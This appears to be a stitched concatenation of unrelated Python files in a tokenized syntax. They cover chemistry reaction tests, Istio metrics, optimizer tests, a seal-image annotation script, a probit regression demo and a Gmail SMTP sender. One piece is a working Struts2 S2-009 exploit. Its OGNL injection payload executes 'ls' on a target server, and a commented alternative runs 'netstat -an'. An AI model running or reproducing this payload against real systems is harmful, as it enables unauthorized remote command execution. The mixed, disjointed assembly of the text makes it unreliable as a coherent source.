<import_stmt>os<import_stmt>sys<line_sep>sys.path.append('../../common')<import_from_stmt>env_indigo *<import_from_stmt>itertools product<line_sep>indigo=Indigo()<def_stmt>getProduct reaction<block_start><for_stmt>mol reaction.iterateProducts()<block_start><return>mol<block_end><return><none><block_end><def_stmt>loadSdf sdf_path<block_start>sdfiterator=indigo.iterateSDFile(sdf_path)<line_sep>result=[m.clone()<for>m sdfiterator]<line_sep>sdfiterator.dispose()<line_sep><return>result<block_end><def_stmt>buildRpeReactions test_dir<block_start>reaction=indigo.loadQueryReactionFromFile(joinPathPy(os.path.join("tests" test_dir "reaction.rxn") __file__))<line_sep>mons=[]<for_stmt>i range(reaction.countReactants())<block_start>reactant_mons=loadSdf(joinPathPy(os.path.join("tests" test_dir "mons{0}.sdf".format(i+1)) __file__))<line_sep>mons.append(reactant_mons)<block_end><return>indigo.reactionProductEnumerate(reaction mons)<block_end><def_stmt>testRpe <block_start><for_stmt>test_dir sorted(os.listdir(joinPathPy("tests" __file__)))<block_start>print("Test %s"%test_dir)<line_sep>rpe_reactions=buildRpeReactions(test_dir)<line_sep>products_smiles=[]<for_stmt>reaction rpe_reactions.iterateArray()<block_start>rpe_product=getProduct(reaction)<line_sep>rpe_csmiles=rpe_product.canonicalSmiles()<line_sep>products_smiles.append(rpe_csmiles)<block_end>products_smiles.sort()<for_stmt>prod_sm products_smiles<block_start>print(" %s"%prod_sm)<block_end><block_end><block_end># make possible options combintation
opset=[product(["rpe-multistep-reactions"] ["0" "1"]) # bug was caused by 1 \
product(["rpe-mode"] ["grid" "one-tube"]) product(["rpe-self-reaction"] ["0" "1"]) product(["rpe-max-depth"] ["1" "3"]) product(["rpe-max-products-count"] ["4" "10"])# 10 -> 100 very long \
]<line_sep># example with bug for test #9
# opset = [ [ ("rpe-multistep-reactions", "1") ] ]
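# product(*opset) yields every combination of one (option, value) pair per option group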
opt_combinations=product(*opset)<line_sep>print("Testing reaction products enumerator with different options")<for_stmt>opt_set opt_combinations<block_start>print("\n*** Test set ***")<for_stmt>opt_tuple opt_set<block_start>print(opt_tuple)<line_sep>indigo.setOption(*opt_tuple)<block_end>testRpe()<block_end>
|
# Copyright Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_stmt>prometheus_client start_http_server Counter Gauge<import_stmt>logging<line_sep>REQUESTS=Counter('stability_outgoing_requests' 'Number of requests from this service.' ['source' 'destination' 'succeeded'])<line_sep>RUNNING=Gauge('stability_test_instances' 'Is this test running' ['test'])<def_stmt>report_metrics <block_start>start_http_server(8080)<block_end><def_stmt>report_running test<block_start>RUNNING.labels(test).set_function(<lambda>:1)<block_end><def_stmt>attempt_request f source destination valid=<none><block_start><try_stmt><block_start>response=f()<if_stmt><not>valid<or>valid(response)<block_start>succeeded=<true><block_end><else_stmt><block_start>succeeded=<false><line_sep>logging.error("Request from {} to {} had invalid response: {}".format(source destination response))<block_end>REQUESTS.labels(source destination succeeded).inc()<line_sep><return>response succeeded<block_end><except_stmt>BaseException<block_start>logging.exception("Request from {} to {} had an exception".format(source destination))<line_sep>REQUESTS.labels(source destination <false>).inc()<line_sep><return><none> <false><block_end><block_end>
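# Illustrative usage (names below are hypothetical, not part of this module):
#   response, ok = attempt_request(lambda: requests.get(target_url), "source-svc", "dest-svc",
#                                  valid=lambda r: r.status_code == 200)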
|
<import_from_stmt>rfhub.blueprints.api blueprint<as>api<import_from_stmt>rfhub.blueprints.dashboard blueprint<as>dashboard<import_from_stmt>rfhub.blueprints.doc blueprint<as>doc<line_sep>
|
<import_stmt>pytest<line_sep>NOTEBOOK_PATH='no_metadata.ipynb'<line_sep>@pytest.fixture<def_stmt>non_existing_notebook_metadata base_url<block_start><return>base_url+f'voila/render/{NOTEBOOK_PATH}'<block_end>@pytest.fixture<def_stmt>voila_args notebook_directory voila_args_extra<block_start><return>['--VoilaTest.root_dir=%r'%notebook_directory]+voila_args_extra<block_end><async_keyword><def_stmt>test_non_existing_metadata http_server_client non_existing_notebook_metadata<block_start>response=<await>http_server_client.fetch(non_existing_notebook_metadata)<assert_stmt>response.code<eq>200<assert_stmt>'Executing without notebook metadata'<in>response.body.decode('utf-8')<block_end>
|
<import_stmt>numpy<as>np<import_from_stmt>opytimizer.optimizers.science mvo<import_from_stmt>opytimizer.spaces search<def_stmt>test_mvo_params <block_start>params={'WEP_min':0.2 'WEP_max':1.0 'p':0.5}<line_sep>new_mvo=mvo.MVO(params=params)<assert_stmt>new_mvo.WEP_min<eq>0.2<assert_stmt>new_mvo.WEP_max<eq>1.0<assert_stmt>new_mvo.p<eq>0.5<block_end><def_stmt>test_mvo_params_setter <block_start>new_mvo=mvo.MVO()<try_stmt><block_start>new_mvo.WEP_min='a'<block_end><except_stmt><block_start>new_mvo.WEP_min=0.75<block_end><try_stmt><block_start>new_mvo.WEP_min=-1<block_end><except_stmt><block_start>new_mvo.WEP_min=0.75<block_end><assert_stmt>new_mvo.WEP_min<eq>0.75<try_stmt><block_start>new_mvo.WEP_max='b'<block_end><except_stmt><block_start>new_mvo.WEP_max=0.9<block_end><try_stmt><block_start>new_mvo.WEP_max=0.1<block_end><except_stmt><block_start>new_mvo.WEP_max=0.9<block_end><try_stmt><block_start>new_mvo.WEP_max=-1<block_end><except_stmt><block_start>new_mvo.WEP_max=0.9<block_end><assert_stmt>new_mvo.WEP_max<eq>0.9<try_stmt><block_start>new_mvo.p='c'<block_end><except_stmt><block_start>new_mvo.p=0.25<block_end><try_stmt><block_start>new_mvo.p=-1<block_end><except_stmt><block_start>new_mvo.p=0.25<block_end><assert_stmt>new_mvo.p<eq>0.25<block_end><def_stmt>test_mvo_update <block_start><def_stmt>square x<block_start><return>np.sum(x<power>2)<block_end>new_mvo=mvo.MVO()<line_sep>search_space=search.SearchSpace(n_agents=2 n_variables=2 lower_bound=[1 1] upper_bound=[10 10])<line_sep>new_mvo.update(search_space square 1 10)<line_sep>new_mvo.update(search_space square 5 10)<block_end>
|
#%% Imports and constants
<import_stmt>os<import_stmt>pandas<as>pd<import_from_stmt>tqdm tqdm<line_sep># from github.com/microsoft/ai4eutils
<import_stmt>url_utils<line_sep># from github.com/microsoft/cameratraps
<import_from_stmt>visualization visualization_utils<line_sep># A list of files in the lilablobssc container for this data set
container_file_list=r'C:\temp\seals\seal_files.txt'<line_sep># The raw detection files provided by NOAA
detections_fn=r'C:\temp\seals\surv_test_kamera_detections_20210212.csv'<line_sep># A version of the above with filename columns added
detections_fn_full_paths=detections_fn.replace('.csv' '_full_paths.csv')<line_sep>base_url='https://lilablobssc.blob.core.windows.net/noaa-kotz'<line_sep>#%% Read input .csv
df=pd.read_csv(detections_fn)<line_sep>df['rgb_image_path']=''<line_sep>df['ir_image_path']=''<line_sep>print('Read {} rows from {}'.format(len(df) detections_fn))<line_sep>camera_view_to_path={}<line_sep>camera_view_to_path['C']='CENT'<line_sep>camera_view_to_path['L']='LEFT'<line_sep>valid_flights=set(['fl04' 'fl05' 'fl06' 'fl07'])<line_sep>#%% Read list of files
<with_stmt>open(container_file_list 'r')<as>f<block_start>all_files=f.readlines()<block_end>all_files=[s.strip()<for>s all_files]<line_sep>all_files=set(all_files)<line_sep>#%% Convert paths to full paths
missing_ir_files=[]<line_sep># i_row = 0; row = df.iloc[i_row]
<for_stmt>i_row,row tqdm(df.iterrows() total=len(df))<block_start><assert_stmt>row['flight']<in>valid_flights<assert_stmt>row['camera_view']<in>camera_view_to_path<assert_stmt>isinstance(row['rgb_image_name'] str)<line_sep>rgb_image_path='Images/{}/{}/{}'.format(row['flight'] camera_view_to_path[row['camera_view']] row['rgb_image_name'])<assert_stmt>rgb_image_path<in>all_files<line_sep>df.loc[i_row 'rgb_image_path']=rgb_image_path<if_stmt><not>isinstance(row['ir_image_name'] str)<block_start><continue><block_end>ir_image_path='Images/{}/{}/{}'.format(row['flight'] camera_view_to_path[row['camera_view']] row['ir_image_name'])<line_sep># assert ir_image_path in all_files
<if_stmt>ir_image_path<not><in>all_files<block_start>missing_ir_files.append(ir_image_path)<block_end>df.loc[i_row 'ir_image_path']=ir_image_path<block_end># ...for each row
missing_ir_files=list(set(missing_ir_files))<line_sep>missing_ir_files.sort()<line_sep>print('{} missing IR files (of {})'.format(len(missing_ir_files) len(df)))<for_stmt>s missing_ir_files<block_start>print(s)<block_end>#%% Write results
df.to_csv(detections_fn_full_paths index=<false>)<line_sep>#%% Load output file, just to be sure
df=pd.read_csv(detections_fn_full_paths)<line_sep>#%% Render annotations on an image
<import_stmt>random<line_sep>i_image=random.randint(0 len(df))<line_sep># i_image = 2004
row=df.iloc[i_image]<line_sep>rgb_image_path=row['rgb_image_path']<line_sep>rgb_image_url=base_url+'/'+rgb_image_path<line_sep>ir_image_path=row['ir_image_path']<line_sep>ir_image_url=base_url+'/'+ir_image_path<line_sep>#%% Download the image
rgb_image_fn=url_utils.download_url(rgb_image_url progress_updater=<true>)<line_sep>ir_image_fn=url_utils.download_url(ir_image_url progress_updater=<true>)<line_sep>#%% Find all the rows (detections) associated with this image
# as l,r,t,b
rgb_boxes=[]<line_sep>ir_boxes=[]<for_stmt>i_row,row df.iterrows()<block_start><if_stmt>row['rgb_image_path']<eq>rgb_image_path<block_start>box_l=row['rgb_left']<line_sep>box_r=row['rgb_right']<line_sep>box_t=row['rgb_top']<line_sep>box_b=row['rgb_bottom']<line_sep>rgb_boxes.append([box_l box_r box_t box_b])<block_end><if_stmt>row['ir_image_path']<eq>ir_image_path<block_start>box_l=row['ir_left']<line_sep>box_r=row['ir_right']<line_sep>box_t=row['ir_top']<line_sep>box_b=row['ir_bottom']<line_sep>ir_boxes.append([box_l box_r box_t box_b])<block_end><block_end>print('Found {} RGB, {} IR annotations for this image'.format(len(rgb_boxes) len(ir_boxes)))<line_sep>#%% Render the detections on the image(s)
img_rgb=visualization_utils.load_image(rgb_image_fn)<line_sep>img_ir=visualization_utils.load_image(ir_image_fn)<for_stmt>b rgb_boxes# In pixel coordinates
<block_start>box_left=b[0]<line_sep>box_right=b[1]<line_sep>box_top=b[2]<line_sep>box_bottom=b[3]<assert_stmt>box_top<g>box_bottom<assert_stmt>box_right<g>box_left<line_sep>ymin=box_bottom<line_sep>ymax=box_top<line_sep>xmin=box_left<line_sep>xmax=box_right<line_sep>visualization_utils.draw_bounding_box_on_image(img_rgb ymin xmin ymax xmax use_normalized_coordinates=<false> thickness=3)<block_end><for_stmt>b ir_boxes# In pixel coordinates
<block_start>box_left=b[0]<line_sep>box_right=b[1]<line_sep>box_top=b[2]<line_sep>box_bottom=b[3]<assert_stmt>box_top<g>box_bottom<assert_stmt>box_right<g>box_left<line_sep>ymin=box_bottom<line_sep>ymax=box_top<line_sep>xmin=box_left<line_sep>xmax=box_right<line_sep>visualization_utils.draw_bounding_box_on_image(img_ir ymin xmin ymax xmax use_normalized_coordinates=<false> thickness=3)<block_end>visualization_utils.show_images_in_a_row([img_rgb img_ir])<line_sep>#%% Save images
img_rgb.save(r'c:\temp\seals_rgb.png')<line_sep>img_ir.save(r'c:\temp\seals_ir.png')<line_sep>#%% Clean up
<import_stmt>shutil<line_sep>tmp_dir=os.path.dirname(rgb_image_fn)<assert_stmt>'ai4eutils'<in>tmp_dir<line_sep>shutil.rmtree(tmp_dir)<line_sep>
|
<import_stmt>pprint<line_sep>print(type(dir(__builtins__)))<line_sep># <class 'list'>
print(len(dir(__builtins__)))<line_sep># 153
pprint.pprint(dir(__builtins__) compact=<true>)<line_sep># ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException',
# 'BlockingIOError', 'BrokenPipeError', 'BufferError', 'BytesWarning',
# 'ChildProcessError', 'ConnectionAbortedError', 'ConnectionError',
# 'ConnectionRefusedError', 'ConnectionResetError', 'DeprecationWarning',
# 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False',
# 'FileExistsError', 'FileNotFoundError', 'FloatingPointError', 'FutureWarning',
# 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError',
# 'IndexError', 'InterruptedError', 'IsADirectoryError', 'KeyError',
# 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'ModuleNotFoundError',
# 'NameError', 'None', 'NotADirectoryError', 'NotImplemented',
# 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'ResourceWarning', 'RuntimeError', 'RuntimeWarning', 'StopAsyncIteration',
# 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit',
# 'TabError', 'TimeoutError', 'True', 'TypeError', 'UnboundLocalError',
# 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError',
# 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError',
# 'Warning', 'ZeroDivisionError', '__IPYTHON__', '__build_class__', '__debug__',
# '__doc__', '__import__', '__loader__', '__name__', '__package__', '__spec__',
# 'abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
print(dir(__builtins__)[0])<line_sep># ArithmeticError
print(type(dir(__builtins__)[0]))<line_sep># <class 'str'>
pprint.pprint([s<for>s dir(__builtins__)<if>s.islower()<and><not>s.startswith('_')] compact=<true>)<line_sep># ['abs', 'all', 'any', 'ascii', 'bin', 'bool', 'breakpoint', 'bytearray',
# 'bytes', 'callable', 'chr', 'classmethod', 'compile', 'complex', 'copyright',
# 'credits', 'delattr', 'dict', 'dir', 'display', 'divmod', 'enumerate', 'eval',
# 'exec', 'filter', 'float', 'format', 'frozenset', 'get_ipython', 'getattr',
# 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int',
# 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'map',
# 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open', 'ord', 'pow',
# 'print', 'property', 'range', 'repr', 'reversed', 'round', 'set', 'setattr',
# 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type',
# 'vars', 'zip']
pprint.pprint([s<for>s dir(__builtins__)<if>s.endswith('Error')] compact=<true>)<line_sep># ['ArithmeticError', 'AssertionError', 'AttributeError', 'BlockingIOError',
# 'BrokenPipeError', 'BufferError', 'ChildProcessError',
# 'ConnectionAbortedError', 'ConnectionError', 'ConnectionRefusedError',
# 'ConnectionResetError', 'EOFError', 'EnvironmentError', 'FileExistsError',
# 'FileNotFoundError', 'FloatingPointError', 'IOError', 'ImportError',
# 'IndentationError', 'IndexError', 'InterruptedError', 'IsADirectoryError',
# 'KeyError', 'LookupError', 'MemoryError', 'ModuleNotFoundError', 'NameError',
# 'NotADirectoryError', 'NotImplementedError', 'OSError', 'OverflowError',
# 'PermissionError', 'ProcessLookupError', 'RecursionError', 'ReferenceError',
# 'RuntimeError', 'SyntaxError', 'SystemError', 'TabError', 'TimeoutError',
# 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError',
# 'UnicodeError', 'UnicodeTranslateError', 'ValueError', 'ZeroDivisionError']
pprint.pprint([s<for>s dir(__builtins__)<if>s.endswith('Warning')] compact=<true>)<line_sep># ['BytesWarning', 'DeprecationWarning', 'FutureWarning', 'ImportWarning',
# 'PendingDeprecationWarning', 'ResourceWarning', 'RuntimeWarning',
# 'SyntaxWarning', 'UnicodeWarning', 'UserWarning', 'Warning']
print('len'<in>dir(__builtins__))<line_sep># True
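# An added side note (not part of the original snippet): __builtins__ is a CPython implementation detail
# (the builtins module in the main script, a plain dict inside imported modules); importing the builtins
# module explicitly exposes the same names in a documented, portable way.
<import_stmt>builtins<line_sep>print(len(dir(builtins)))<line_sep># e.g. 153, depending on the Python version and environment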
|
# Copyright (C) 2021 Intel Corporation. All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
<import_stmt>lxml.etree<def_stmt>add_child element tag text=<none> **kwargs<block_start>child=lxml.etree.Element(tag)<line_sep>child.text=text<for_stmt>k,v kwargs.items()<block_start>child.set(k v)<block_end>element.append(child)<line_sep><return>child<block_end><def_stmt>get_node etree xpath<block_start>result=etree.xpath(xpath)<assert_stmt>len(result)<le>1 "Internal error: cannot get texts from multiple nodes at a time"<line_sep><return>result[0]<if>len(result)<eq>1<else><none><block_end>
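# Hypothetical usage sketch (an illustrative addition, not part of the original module): building a tiny
# element tree with add_child and querying it back with get_node; the tag and attribute names are examples.
<if_stmt>__name__<eq>"__main__"<block_start>root=lxml.etree.Element("config")<line_sep>add_child(root "vm" text="vm0" id="0")<line_sep>print(get_node(root "//vm[@id='0']/text()"))<block_end>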
|
<import_stmt>requests<line_sep># the target URL can be arbitrary
<def_stmt>poc url<block_start>print('test {} --> struts2_009'.format(url))<line_sep>url<augadd>"/ajax/example5.action"<line_sep># execute the ls command
exp="?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] HTTP/1.1"<line_sep>#exp = '''?class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
url<augadd>exp<try_stmt><block_start>resp=requests.get(url timeout=10)<line_sep>print(resp)<if_stmt>resp.status_code<eq>200<block_start>print('test --> struts2_009 Success!')<line_sep><return><true><block_end><block_end><except_stmt><block_start>print('test --> struts2_009 Failed!')<line_sep><return><false><block_end><return><false><block_end><if_stmt>__name__<eq>"__main__"<block_start>print(poc('http://127.0.0.1:8080'))<block_end>
|
"""
django-peeringdb backend setup (needed for pdb_load_data command)
"""<import_from_stmt>django_peeringdb.client_adaptor.setup configure# noqa
|
# Copyright 2018/2019 ducandu GmbH, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
<import_stmt>numpy<as>np<import_from_stmt>rlgraph get_backend<import_from_stmt>rlgraph.components.loss_functions.supervised_loss_function SupervisedLossFunction<import_from_stmt>rlgraph.spaces.bool_box BoolBox<import_from_stmt>rlgraph.utils.decorators rlgraph_api<if_stmt>get_backend()<eq>"tf"<block_start><import_stmt>tensorflow<as>tf<block_end><class_stmt>EuclidianDistanceLoss(SupervisedLossFunction)<block_start>"""
Calculates the loss between two vectors (prediction and label) via their Euclidean distance:
d(v,w) = SQRT(SUMi( (vi - wi)² ))
"""<def_stmt>__init__ self time_steps=<none> scope="euclidian-distance" **kwargs<block_start>"""
Args:
time_steps (Optional[int]): If given, reduce-sum linearly over this many timesteps with weights going
from 0.0 (first time-step) to 1.0 (last-timestep).
"""<line_sep>super(EuclidianDistanceLoss self).__init__(scope=scope **kwargs)<line_sep>self.time_steps=time_steps<line_sep>self.reduce_ranks=<none><line_sep>self.time_rank=<none><line_sep>self.time_major=<none><line_sep>self.is_bool=<none><block_end><def_stmt>check_input_spaces self input_spaces action_space=<none><block_start>in_space=input_spaces["labels"]<line_sep>self.is_bool=isinstance(in_space BoolBox)# Need to cast (to 0.0 and 1.0) in graph_fn?
self.reduce_ranks=np.array(list(range(in_space.rank)))<if_stmt>in_space.has_batch_rank<block_start>self.reduce_ranks<augadd>1<block_end><if_stmt>in_space.has_time_rank<block_start>self.reduce_ranks<augadd>1<block_end>self.time_rank=in_space.has_time_rank<line_sep>self.time_major=in_space.time_major<block_end>@rlgraph_api<def_stmt>_graph_fn_loss_per_item self parameters labels sequence_length=<none> time_percentage=<none><block_start>"""
Euclidean distance loss.
Args:
parameters (SingleDataOp): Output predictions.
labels (SingleDataOp): Labels.
sequence_length (SingleDataOp): The lengths of each sequence (if applicable) in the given batch.
Returns:
SingleDataOp: The loss values vector (one single value for each batch item).
"""<line_sep>batch_rank=0<if>self.time_major<is><false><else>1<line_sep>time_rank=0<if>batch_rank<eq>1<else>1<if_stmt>get_backend()<eq>"tf"# Reduce over last rank (vector axis) and take the square root.
<block_start><if_stmt>self.is_bool<block_start>labels=tf.cast(labels tf.float32)<line_sep>parameters=tf.cast(parameters tf.float32)<block_end>euclidian_distance=tf.square(tf.subtract(parameters labels))<line_sep>euclidian_distance=tf.reduce_sum(euclidian_distance axis=self.reduce_ranks)<line_sep>euclidian_distance=tf.sqrt(euclidian_distance)<line_sep># TODO: Make it possible to customize the time-step decay (or increase?) behavior.
# Weight over time-steps (linearly decay weighting over time rank, cutting out entirely values past the
# sequence length).
<if_stmt>sequence_length<is><not><none><block_start>max_time_steps=tf.cast(tf.shape(labels)[time_rank] dtype=tf.float32)<line_sep>sequence_mask=tf.sequence_mask(sequence_length max_time_steps dtype=tf.float32)<line_sep>sequence_decay=tf.expand_dims(tf.range(start=1.0 limit=0.0 delta=-1.0/max_time_steps dtype=tf.float32) axis=batch_rank)<line_sep>weighting=sequence_mask<times>sequence_decay<line_sep>euclidian_distance=tf.multiply(euclidian_distance weighting)<line_sep># Reduce away the time-rank.
euclidian_distance=tf.reduce_sum(euclidian_distance axis=time_rank)<line_sep>euclidian_distance=tf.divide(euclidian_distance tf.cast(sequence_length dtype=tf.float32))<block_end><else_stmt># Reduce away the time-rank.
<block_start><if_stmt>hasattr(parameters "_time_rank")<block_start>euclidian_distance=tf.reduce_mean(euclidian_distance axis=time_rank)<block_end><block_end><return>euclidian_distance<block_end><block_end><block_end>
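# Illustrative standalone check (an addition, not part of the original module): per item, the loss above is the
# plain Euclidean distance sqrt(sum_i (v_i - w_i)^2); e.g. for v=[1,2,2] and w=[0,0,0] it is sqrt(1+4+4)=3.
<if_stmt>__name__<eq>"__main__"<block_start>v=np.array([1.0 2.0 2.0])<line_sep>w=np.array([0.0 0.0 0.0])<line_sep>print(np.sqrt(np.sum(np.square(v-w))))<block_end>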
|
#Sending an email through gmail using Python - <NAME>
<import_stmt>smtplib<line_sep>fromaddr='<EMAIL>'<line_sep>toaddrs='<EMAIL>'<line_sep>msg='Email message from PYTHON Raghuram app'<line_sep>#provide gmail user name and password
username='gmailUserName'<line_sep>password='<PASSWORD>'<line_sep># functions to send an email
server=smtplib.SMTP('smtp.gmail.com:587')<line_sep>server.ehlo()<line_sep>server.starttls()<line_sep>server.ehlo()<line_sep>server.login(username password)<line_sep>server.sendmail(fromaddr toaddrs msg)<line_sep>server.quit()<line_sep>
|
<import_from_stmt>.base_exception MAROException<import_from_stmt>.error_code ERROR_CODE<line_sep>__all__=["ERROR_CODE" "MAROException"]<line_sep>
|
<import_stmt>superimport<import_stmt>numpy<as>np<import_from_stmt>scipy.stats norm<import_from_stmt>scipy.optimize minimize<import_from_stmt>matplotlib pyplot<as>plt<import_from_stmt>cycler cycler<import_stmt>jax.numpy<as>jnp<import_stmt>jax.scipy.stats.norm<as>jnorm<import_from_stmt>jax grad<import_stmt>pyprobml_utils<as>pml<import_from_stmt>statsmodels.discrete.discrete_model Probit<line_sep>cb_color=['#377eb8' '#ff7f00']<line_sep>cb_cycler=(cycler(linestyle=['-' '--' '-.'])<times>cycler(color=cb_color))<line_sep>plt.rc('axes' prop_cycle=cb_cycler)<line_sep>np.random.seed(0)<class_stmt>ProbitReg<block_start><def_stmt>__init__ self<block_start>self.loglikehist=[]<line_sep>self.max_iter=100<line_sep>self.tolerance=1e-4<line_sep>self.w=[]<block_end># Probit NLL = -y*log(gauss.cdf(X.w)) - (1-y)*log(gauss.cdf(-(X.w)))
<def_stmt>probitloss self X y w# NLL
<block_start><return>-jnp.sum(y<times>jnorm.logcdf(jnp.dot(X w)))-jnp.sum((1-y)<times>jnorm.logcdf(-jnp.dot(X w)))<block_end><def_stmt>objfn self X y w lam# penalized likelihood.
<block_start><return>jnp.sum(lam<times>jnp.square(w[1:]))-self.probitloss(X y w)<block_end><def_stmt>probreg_fit_em self X y lam<block_start>self.w=np.linalg.lstsq(X+np.random.rand(X.shape[0] X.shape[1]) y rcond=<none>)[0].reshape(-1 1)<def_stmt>estep w<block_start>u=X@w<line_sep>z=u+norm.pdf(u)/((y<eq>1)-norm.cdf(-u))<line_sep>loglik=self.objfn(X y w lam)<line_sep><return>z loglik<block_end># M step function is the ridge regression
<def_stmt>mstep X y lam<block_start><return>ridge_reg(X y lam)<block_end>i=1<line_sep>stop=<false><while_stmt><not>stop<block_start>z,loglike=estep(self.w)<line_sep>self.loglikehist.append(loglike)<line_sep>self.w=mstep(X z lam)<if_stmt>i<ge>self.max_iter<block_start>stop=<true><block_end><elif_stmt>i<g>1# if slope becomes less than tolerance.
<block_start>stop=np.abs((self.loglikehist[i-1]-self.loglikehist[i-2])/(self.loglikehist[i-1]+self.loglikehist[i-2]))<le>self.tolerance/2<block_end>i<augadd>1<block_end>self.loglikehist=self.loglikehist[0:i-1]<line_sep><return>self.w np.array(self.loglikehist)<block_end><def_stmt>probit_reg_fit_gradient self X y lam<block_start>winit=jnp.linalg.lstsq(X+np.random.rand(X.shape[0] X.shape[1]) y rcond=<none>)[0].reshape(-1 1)<line_sep>self.loglikehist=[]<line_sep>self.loglikehist.append((-self.objfn(X y winit lam)))<def_stmt>obj w<block_start>w=w.reshape(-1 1)<line_sep># PNLL
<return>self.probitloss(X y w)+jnp.sum(lam<times>jnp.square(w[1:]))<block_end><def_stmt>grad_obj w<block_start><return>grad(obj)(w)<block_end><def_stmt>callback w<block_start>loglik=obj(w)# LL
self.loglikehist.append(loglik)<block_end>res=minimize(obj x0=winit jac=grad_obj callback=callback method='BFGS')<line_sep><return>res['x'] np.array(self.loglikehist[0:-1])<block_end><def_stmt>predict self X w<block_start>p=jnorm.cdf(jnp.dot(X w))<line_sep>y=np.array((p<g>0.5) dtype='int32')<line_sep><return>y p<block_end><block_end># using matrix inversion for ridge regression
<def_stmt>ridge_reg X y lambd# returns weight vectors.
<block_start>D=X.shape[1]<line_sep>w=np.linalg.inv(X.T@X+lambd<times>np.eye(D D))@X.T@y<line_sep><return>w<block_end><def_stmt>flip_bits y p<block_start>x=np.random.rand(y.shape[0] 1)<l>p<line_sep>y[x<l>p]=1-y[x<l>p]<line_sep><return>y<block_end>n,d=100 2<line_sep>data_x=np.random.randn(n d)<line_sep>w=np.random.randn(d 1)<line_sep>data_y=flip_bits((data_x@w<g>0) 0)<line_sep>lam=1e-2<line_sep># statsmodel.Probit
sm_probit_reg=Probit(exog=data_x endog=data_y).fit(disp=0 method='bfgs')<line_sep>sm_probit_prob=sm_probit_reg.predict(exog=data_x)<line_sep># Our Implementation:
probit_reg=ProbitReg()<line_sep># EM:
em_w,obj_trace_em=probit_reg.probreg_fit_em(data_x data_y lam)<line_sep>em_ypred,em_prob=probit_reg.predict(data_x em_w)<line_sep># gradient:
gradient_w,obj_trace_gradient=probit_reg.probit_reg_fit_gradient(data_x data_y lam)<line_sep>gradient_ypred,gradient_prob=probit_reg.predict(data_x gradient_w)<line_sep>plt.figure()<line_sep>plt.plot(sm_probit_prob em_prob 'o')<line_sep>plt.xlabel('statsmodel.probit')<line_sep>plt.ylabel('em')<line_sep>plt.figure()<line_sep>plt.plot(gradient_prob em_prob 'o')<line_sep>plt.xlabel('bfgs')<line_sep>plt.ylabel('em')<line_sep>plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))<line_sep>plt.show()<line_sep>plt.figure()<line_sep>plt.plot(-obj_trace_em.flatten() '-o' linewidth=2)<line_sep>plt.plot(obj_trace_gradient.flatten() ':s' linewidth=1)<line_sep>plt.legend(['em' 'bfgs'])<line_sep>plt.title('probit regression with L2 regularizer of {0:.3f}'.format(lam))<line_sep>plt.ylabel('logpost')<line_sep>plt.xlabel('iter')<line_sep>pml.save_fig('../figures/probitRegDemoNLL.pdf')<line_sep>plt.show()<line_sep>
|
#
# Copyright 2021 Red Hat Inc.
